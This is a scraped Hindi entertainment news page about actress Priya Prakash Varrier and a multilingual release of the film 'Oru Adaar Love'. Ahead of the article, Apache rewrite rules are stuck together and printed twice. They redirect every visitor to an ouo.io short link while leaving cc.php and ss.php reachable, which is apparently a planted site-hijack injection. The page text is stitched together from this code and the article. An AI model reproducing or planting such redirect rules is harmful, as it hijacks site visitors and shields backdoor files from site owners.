
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 413
Previous Nextसाऊथ एक्ट्रेस प्रिया प्रकाश वारियर ने वेलंटाइन के दिन सोशल साइट पर अपना छोटा सा वीडियो क्या डाला था। उस वीडियो ने उन्हें रातों रात स्टार बना दिया था। हम आज प्रिया प्रकाश वारियर की इसलिए बात कर रहे है क्योंकि आप भी प्रिया के आंखों के इशारे देख सकते है। जी हां ये हम नहीं कह रहे है..ब्लकि खबरें आ रही है कि साऊथ एक्ट्रेस प्रिया प्रकाश वारियर अब बड़े परदे पर सिर्फ दक्षिण भारतीय भाषाओं में ही नहीं बल्कि हिंदी के दर्शकों को भी अपना अंदाज़ दिखाएंगी।
केरल की रहने वाली 18 साल की प्रिया प्रकाश वारियर अपनी मलयालम फिल्म ओरु अदार लव (Oru Adaar Love) के एक गाने ‘माणिक्य मलराय पूवी...’ में अपनी आंखों का गज़ब का एक्सप्रेशन दिखाने के कारण रातो रात इंटरनेट पर छा गई थीं। बताते हैं कि प्रिया प्रकाश की देश भर में फैली लोकप्रियता को देखते हुए अब उनके फिल्म के निर्माता ने इसे भुनाने का फैसला किया है और बताया जाता है कि इसी कारण अब ओरु अदार लव को मलयालम के अलावा तमिल, तेलुगु और हिंदी में भी रिलीज़ करने का फैसला किया गया है। हालांकि निर्माता की तरफ़ से अभी तक इस बार की आधिकारिक घोषणा नहीं की गई है। ओमर लुलु के निर्देशन में बनी कॉलेज रोमांस वाली इस फिल्म में प्रिया के अलावा रोशन अब्दुल रौफ और नूरीं शेरिफ ने भी काम किया है। बताया जा रहा ही कि इन सारी भाषाओं के साथ फिल्म इस साल ईद के मौके पर रिलीज़ होगी।